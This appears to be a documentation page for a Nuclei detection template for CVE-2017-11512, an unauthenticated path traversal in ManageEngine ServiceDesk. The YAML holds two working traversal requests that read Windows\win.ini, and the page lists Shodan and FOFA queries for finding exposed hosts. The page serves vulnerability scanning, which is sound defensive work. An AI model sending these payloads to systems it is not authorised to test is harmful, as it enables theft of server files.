ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval
ID: CVE-2017-11512
Severity: high
Author: 0x_Akoko
Tags: cve,cve2017,manageengine,lfr,unauth,tenable
Description
Section titled “Description”ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
YAML Source
Section titled “YAML Source”id: CVE-2017-11512
info: name: ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval author: 0x_Akoko severity: high description: | ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. impact: | An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage. remediation: | Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches. reference: - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html - https://www.tenable.com/security/research/tra-2017-31 - https://nvd.nist.gov/vuln/detail/CVE-2017-11512 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-11512 cwe-id: CWE-22 epss-score: 0.97175 epss-percentile: 0.99794 cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: manageengine product: servicedesk shodan-query: - http.title:"ManageEngine" - http.title:"manageengine" fofa-query: title="manageengine" google-query: intitle:"manageengine" tags: cve,cve2017,manageengine,lfr,unauth,tenable
http: - method: GET path: - '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini' - '{{BaseURL}}/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini'
stop-at-first-match: true matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and# digest: 4a0a0047304502204a94044ff73276007dfd425b58c7b1f446627eb1baf2eafc924c0ca182bd0c32022100c9a1c4d04178af53f558be3e211fed6b4b40b171ef50bb05336a0b7e4c3888f0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-11512.yaml"